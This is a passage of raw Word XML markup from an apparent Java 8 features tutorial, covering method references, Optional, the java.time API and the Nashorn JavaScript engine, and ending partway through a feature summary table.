          <v:rect id="_x0000_i1675" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="35C9BE86" w14:textId="77777777" w:rsidR="00B32BAB" w:rsidRPr="00CE4B95" w:rsidRDefault="00B32BAB" w:rsidP="00B32BAB">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Style w:val="Strong"/>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t>5. Method References</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="179EE649" w14:textId="77777777" w:rsidR="00B32BAB" w:rsidRPr="00CE4B95" w:rsidRDefault="00B32BAB" w:rsidP="00B32BAB">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t>Shorthand for calling existing methods.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48ABE965" w14:textId="61325584" w:rsidR="004033C5" w:rsidRPr="00CE4B95" w:rsidRDefault="004033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4088121"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>name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orEach</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p>
    <w:p w14:paraId="3D3B9A52" w14:textId="77777777" w:rsidR="00B32BAB" w:rsidRPr="00CE4B95" w:rsidRDefault="00B32BAB" w:rsidP="00B32BAB">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Cleaner than writing lambdas when reusing existing methods.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="329C17A7" w14:textId="77777777" w:rsidR="00B32BAB" w:rsidRPr="00CE4B95" w:rsidRDefault="00000000" w:rsidP="00B32BAB">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:pict w14:anchorId="2E2BA007">
          <v:rect id="_x0000_i1676" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="29442FAC" w14:textId="77777777" w:rsidR="00B32BAB" w:rsidRPr="00CE4B95" w:rsidRDefault="00B32BAB" w:rsidP="00B32BAB">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Style w:val="Strong"/>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t>6. Optional Class</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37E59055" w14:textId="77777777" w:rsidR="00B32BAB" w:rsidRPr="00CE4B95" w:rsidRDefault="00B32BAB" w:rsidP="00B32BAB">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve">A container to handle </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t>null</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve"> values more gracefully.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E62D63B" w14:textId="77777777" w:rsidR="00693EFB" w:rsidRPr="00CE4B95" w:rsidRDefault="00693E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720945"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="660066"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Optional</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Optiona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ofNullabl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Name</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>());</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5691D0B7" w14:textId="5277EF15" w:rsidR="00693EFB" w:rsidRPr="00CE4B95" w:rsidRDefault="00693E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720945"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>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fPresen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p>
    <w:p w14:paraId="0C1EB352" w14:textId="77777777" w:rsidR="00B32BAB" w:rsidRPr="00CE4B95" w:rsidRDefault="00B32BAB" w:rsidP="00B32BAB">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Avoids </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t>NullPointerException</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve"> and encourages functional style handling of absence.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="664A9BBB" w14:textId="77777777" w:rsidR="00B32BAB" w:rsidRPr="00CE4B95" w:rsidRDefault="00B32BAB" w:rsidP="00B32BAB">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Style w:val="Strong"/>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t>7. Date and Time API (java.time)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57454FBD" w14:textId="77777777" w:rsidR="00B32BAB" w:rsidRPr="00CE4B95" w:rsidRDefault="00B32BAB" w:rsidP="00B32BAB">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve">A comprehensive replacement for legacy </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t>java.util.Date</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve"> and </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t>Calendar</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34E61EEE" w14:textId="77777777" w:rsidR="0062519A" w:rsidRPr="00CE4B95" w:rsidRDefault="006251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853623"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="660066"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>LocalDate</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> toda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ocalDat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ow</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B1EABEE" w14:textId="65D51B3B" w:rsidR="0062519A" w:rsidRPr="00CE4B95" w:rsidRDefault="006251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853623"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="660066"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>LocalDate</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> birthda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ocalDate</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f</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99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on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RC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0</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7718A924" w14:textId="77777777" w:rsidR="00B32BAB" w:rsidRPr="00CE4B95" w:rsidRDefault="00B32BAB" w:rsidP="00B32BAB">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Immutable, thread-safe, and more readable.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="081DBD8C" w14:textId="77777777" w:rsidR="00B32BAB" w:rsidRPr="00CE4B95" w:rsidRDefault="00000000" w:rsidP="00B32BAB">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:pict w14:anchorId="545C32E5">
          <v:rect id="_x0000_i1677" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="77FD53E3" w14:textId="77777777" w:rsidR="00B32BAB" w:rsidRPr="00CE4B95" w:rsidRDefault="00B32BAB" w:rsidP="00B32BAB">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Style w:val="Strong"/>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t>8. Nashorn JavaScript Engine</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C8815DD" w14:textId="77777777" w:rsidR="00B32BAB" w:rsidRPr="00CE4B95" w:rsidRDefault="00B32BAB" w:rsidP="00B32BAB">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t>Allows Java to execute JavaScript code.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B3FC810" w14:textId="77777777" w:rsidR="00CC7B2F" w:rsidRPr="00CE4B95" w:rsidRDefault="00CC7B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407651"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="660066"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>ScriptEngine</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> engin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criptEngineMana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EngineByNam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ashorn"</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="282A334E" w14:textId="5409D288" w:rsidR="00CC7B2F" w:rsidRPr="00CE4B95" w:rsidRDefault="00CC7B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407651"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>engine</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eval</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rint('Hello JavaScript')"</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0479E88B" w14:textId="77777777" w:rsidR="00B32BAB" w:rsidRPr="00CE4B95" w:rsidRDefault="00B32BAB" w:rsidP="00B32BAB">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Deprecated in later versions.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53DACEFF" w14:textId="77777777" w:rsidR="00B32BAB" w:rsidRPr="00CE4B95" w:rsidRDefault="00000000" w:rsidP="00B32BAB">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:pict w14:anchorId="701954E1">
          <v:rect id="_x0000_i1678" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C43F6D0" w14:textId="77777777" w:rsidR="00B32BAB" w:rsidRPr="00CE4B95" w:rsidRDefault="00B32BAB" w:rsidP="00B32BAB">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24"/>
        <w:gridCol w:w="4825"/>
      </w:tblGrid>
      <w:tr w:rsidR="00B32BAB" w:rsidRPr="00CE4B95" w14:paraId="1D1A5830" w14:textId="77777777" w:rsidTr="00B32BAB">
        <w:trPr>
          <w:tblHeader/>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="26604BCD" w14:textId="77777777" w:rsidR="00B32BAB" w:rsidRPr="00CE4B95" w:rsidRDefault="00B32BAB" w:rsidP="00B32BAB">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00CE4B95">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Feature</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5748C0D4" w14:textId="77777777" w:rsidR="00B32BAB" w:rsidRPr="00CE4B95" w:rsidRDefault="00B32BAB" w:rsidP="00B32BAB">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00CE4B95">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Description</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B32BAB" w:rsidRPr="00CE4B95" w14:paraId="4EC54BD5" w14:textId="77777777" w:rsidTr="00B32BAB">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="16B5F4BE" w14:textId="77777777" w:rsidR="00B32BAB" w:rsidRPr="00CE4B95" w:rsidRDefault="00B32BAB" w:rsidP="00B32BAB">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00CE4B95">
              <w:rPr>
                <w:rStyle w:val="Strong"/>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>Lambda Expressions</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5D7AE58D" w14:textId="77777777" w:rsidR="00B32BAB" w:rsidRPr="00CE4B95" w:rsidRDefault="00B32BAB" w:rsidP="00B32BAB">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00CE4B95">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>Anonymous functions for concise code</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B32BAB" w:rsidRPr="00CE4B95" w14:paraId="72086DE3" w14:textId="77777777" w:rsidTr="00B32BAB">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="01FAFCA7" w14:textId="77777777" w:rsidR="00B32BAB" w:rsidRPr="00CE4B95" w:rsidRDefault="00B32BAB" w:rsidP="00B32BAB">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00CE4B95">
              <w:rPr>
                <w:rStyle w:val="Strong"/>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>Functional Interfaces</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="14BB5715" w14:textId="77777777" w:rsidR="00B32BAB" w:rsidRPr="00CE4B95" w:rsidRDefault="00B32BAB" w:rsidP="00B32BAB">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00CE4B95">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>Target types for lambdas</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B32BAB" w:rsidRPr="00CE4B95" w14:paraId="4E065379" w14:textId="77777777" w:rsidTr="00B32BAB">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="486C8338" w14:textId="77777777" w:rsidR="00B32BAB" w:rsidRPr="00CE4B95" w:rsidRDefault="00B32BAB" w:rsidP="00B32BAB">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00CE4B95">
              <w:rPr>
                <w:rStyle w:val="Strong"/>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>Stream API</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="05F2C899" w14:textId="77777777" w:rsidR="00B32BAB" w:rsidRPr="00CE4B95" w:rsidRDefault="00B32BAB" w:rsidP="00B32BAB">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00CE4B95">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>Declarative collection processing</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B32BAB" w:rsidRPr="00CE4B95" w14:paraId="7B2CED13" w14:textId="77777777" w:rsidTr="00B32BAB">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="63BD2425" w14:textId="77777777" w:rsidR="00B32BAB" w:rsidRPr="00CE4B95" w:rsidRDefault="00B32BAB" w:rsidP="00B32BAB">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00CE4B95">
              <w:rPr>
                <w:rStyle w:val="Strong"/>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>Default/Static Methods</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6A207B73" w14:textId="77777777" w:rsidR="00B32BAB" w:rsidRPr="00CE4B95" w:rsidRDefault="00B32BAB" w:rsidP="00B32BAB">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00CE4B95">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>Method implementation in interfaces</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B32BAB" w:rsidRPr="00CE4B95" w14:paraId="22E16FEC" w14:textId="77777777" w:rsidTr="00B32BAB">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="058FED3D" w14:textId="77777777" w:rsidR="00B32BAB" w:rsidRPr="00CE4B95" w:rsidRDefault="00B32BAB" w:rsidP="00B32BAB">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00CE4B95">
              <w:rPr>
                <w:rStyle w:val="Strong"/>
